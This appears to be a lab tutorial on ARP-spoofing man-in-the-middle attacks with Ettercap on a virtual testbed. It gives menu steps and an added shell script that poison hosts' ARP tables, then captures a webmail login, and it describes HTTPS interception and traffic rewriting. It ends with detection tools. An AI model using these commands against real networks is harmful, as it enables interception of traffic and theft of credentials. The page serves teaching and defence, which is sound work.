My-Tiny.Net :: Breaking Bad



Ettercap: ARP Spoofing



Ettercap is a tool for sniffing and man-in-the-middle attacks on a local network. Ettercap has two main strengths:

First, Ettercap fully automates ARP spoofing (also known as ARP poisoning). On a switched network a host only receives frames addressed to its own MAC address, so a sniffer cannot simply listen; instead the attacker sends forged ARP replies that bind the IP address of the gateway or of another host to the attacker's MAC address. The victims then send their traffic to the attacker, who, with complete control of that one host, can choose to forward the traffic on unchanged, alter it, or throw it away ...

Second, Ettercap is capable of performing man-in-the-middle attacks on many protocols, including SSH1 and HTTPS. Ettercap alone intercepts and re-sends packets, and "etterfilters" can be used to modify the content. This could be as simple as changing the word "buy" to "sell" in all web traffic, or as complex as substituting its own keys into a key exchange so that the "secure" session can be read. Note that for HTTPS this means presenting the client with a certificate that Ettercap generated, so a browser that checks certificates will warn; the attack depends on the user clicking through.

To get started, you need to migrate your TinyNet Webserver and MailHost to Net-R (see Setup::Single Subnet on the menu). Using Ettercap to poison a gateway is a bit more complicated, so be sure to read the man pages if you want to do that.

Then create a normal Net-R host and install Ettercap from the TinyNetConfig.iso:
  1. Start Ettercap with the simple menu (ncurses) interface: ettercap -C

  2. From the Sniff menu, select Unified Sniffing.

  3. From the Hosts menu, select Scan for hosts.
    When it is finished, select Host List to see all the potential targets that Ettercap found.

  4. Select the domserv (192.168.234.101) in the Host List and press 1 to add it to the Targets List as Target 1.

  5. Select the others in the Host List (one-by-one) and press 2 to add them to the Targets List as Target 2.

  6. Use Ctrl-Q to exit the Host List, then select Targets and Current Targets from the menu.
    The display shows that Ettercap will catch and forward traffic between Target 1 and Target(s) 2.

  7. Use Ctrl-Q to exit the Targets List, select MITM (Man in the Middle) on the menu and select Arp Poisoning to spoof the ARP tables. Press Enter to leave the Parameters box empty.

  8. Go to the Domserv, start links and log into Squirrelmail on your Net-R webserver.
    Watch your Ettercap VM to see your credentials!

Run arp -a on each VM to see the output: on the poisoned hosts the other target's IP address is now listed against the Ettercap VM's MAC address ...

To stop sniffing, just go to the Mitm menu and select Stop Mitm attacks.
Or, just press Ctrl-X to "un-poison" the network and close.

Run arp -a on each VM again: Ettercap sends the real addresses back out when it stops, so the entries should return to the correct MAC addresses ...
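The same run from Ettercap's text interface instead of the ncurses menus, as an added example (this is not code from the My-Tiny.Net page or from the Ettercap project). It assumes the attacker VM's interface is eth0 and that the Net-R webserver is at 192.168.234.102; the page only gives domserv's address, so both are overridable through the environment.

```shell
#!/bin/sh
# Added example, not code from the My-Tiny.Net page or the Ettercap project:
# the poisoning run above done from the text interface (-T) instead of ncurses.
# Assumed: attacker interface eth0 and webserver 192.168.234.102 (hypothetical);
# domserv's 192.168.234.101 is the address the page gives.
IFACE="${IFACE:-eth0}"
DOMSERV="${DOMSERV:-192.168.234.101}"        # Target 1 (from the page)
WEBSERVER="${WEBSERVER:-192.168.234.102}"    # Target 2 (hypothetical address)

# Ettercap 0.8.x targets are written MAC/IPs/IPv6/PORTs, so a single IPv4 host
# is /IP// (0.7.x has no IPv6 field, so it is /IP/). An empty field means "any".
target_spec() {
  printf '/%s//' "$1"
}

# Full command line: -T text interface, -q quiet (no packet dump on screen),
# -i interface, -M arp:remote poisons both targets so that traffic through a
# gateway is caught as well as traffic between two hosts on the subnet.
ettercap_cmd() {
  printf 'ettercap -T -q -i %s -M arp:remote %s %s' \
    "$1" "$(target_spec "$2")" "$(target_spec "$3")"
}

# Checks worth doing before poisoning a live segment: root (raw sockets),
# tool present, interface exists. Returns non-zero with a reason on failure.
preflight() {
  [ "$(id -u)" -eq 0 ] || { echo "preflight: run as root" >&2; return 1; }
  command -v ettercap >/dev/null 2>&1 || { echo "preflight: ettercap not found" >&2; return 1; }
  ip link show "$1" >/dev/null 2>&1 || { echo "preflight: no interface $1" >&2; return 1; }
}

# Only poison when explicitly asked, so sourcing this file never touches the
# network. Press q in the text interface to stop: Ettercap re-ARPs the victims
# with the real addresses on exit, which is the "un-poison" step above.
if [ "${RUN_POISON:-0}" = 1 ] && preflight "$IFACE"; then
  echo "+ $(ettercap_cmd "$IFACE" "$DOMSERV" "$WEBSERVER")"
  ettercap -T -q -i "$IFACE" -M arp:remote \
    "$(target_spec "$DOMSERV")" "$(target_spec "$WEBSERVER")"
fi
```

Run it as root on the Ettercap VM with RUN_POISON=1; without that variable it only defines the helpers, which is handy for checking the target syntax before touching the segment.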

The nice thing about doing this on a testbed is that you really can't break anything or end up in jail.

Interface Tips:

  • Use Tab and the arrow keys to change the window/menu you are interacting with.
  • Use Ctrl-Q to close any active window in the Ettercap interface.

Ettercap on VMs Tip:

If the host OS's bridged/host-only interface (192.168.56.1) is on the same segment as the VMs, poisoning with targets ALL / ALL (every host against every other) is unstable. Pick explicit targets as in the steps above instead.


Further Reference

  • Good overview - Great Site: https://www.veracode.com/security/arp-spoofing
  • Ettercap man pages: ettercap, ettercap_curses, etter.conf, etterlog, etterfilter, ettercap_plugins
  • Also at irongeek.com: Fun with Ettercap Filters, Tons of Hacking Illustrated Videos, Useful Articles, Apps and Scripts, what the .gov and .mil find interesting ...

XArp is a GUI ARP spoofing detection and active probing tool that works on both Windows and Linux (and can be configured for OS X as well). ArpON is a portable handler daemon that secures ARP against spoofing and cache poisoning. There are a few others, such as Arpwatch, Antidote and ArpAlert, so just Google them. All of them watch for the same two symptoms you saw with arp -a above: an IP address whose MAC address suddenly changes, and one MAC address answering for more than one IP address.